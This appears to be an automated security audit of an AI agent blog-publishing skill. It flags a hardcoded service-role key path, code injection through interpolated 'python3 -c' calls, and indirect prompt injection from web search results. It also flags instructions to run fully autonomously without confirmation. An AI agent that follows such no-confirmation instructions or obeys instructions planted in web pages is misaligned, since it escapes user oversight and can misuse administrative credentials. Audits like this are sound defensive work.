blog-psquared
Warn
Audited by Gen Agent Trust Hub on Apr 10, 2026
Risk Level: MEDIUMCREDENTIALS_UNSAFECOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [CREDENTIALS_UNSAFE]: The skill is configured to read high-privilege credentials, including a
SUPABASE_SERVICE_ROLE_KEY, from a hardcoded file path specific to a local user directory:/Users/martinpammesberger/.agents/config/blog-credentials.env. Service role keys grant administrative access that bypasses standard database security policies. - [REMOTE_CODE_EXECUTION]: The skill uses
python3 -cto execute a script that involves interpolating variables (such as blog titles and content) into code structures. Because this content is sourced from external web research, it presents a risk of code injection if the agent does not properly escape the strings before shell execution. - [COMMAND_EXECUTION]: Utilizes shell commands such as
sourceto load environment variables andcurlto interact with remote API endpoints. - [PROMPT_INJECTION]: Contains explicit instructions to "Run fully autonomously" and "Do not ask for confirmation between steps." This behavior reduces the user's ability to review or intercept actions, which is particularly concerning given the skill's ability to write to external databases.
- [DATA_EXFILTRATION]: Transmits sensitive administrative API keys and generated content to an external Supabase instance via network requests.
- [EXTERNAL_DOWNLOADS]: Ingests data from the internet via
WebSearchto generate content. This creates an attack surface for indirect prompt injection, where malicious instructions hidden on web pages could influence the agent's behavior during the writing or publishing phase.
Audit Metadata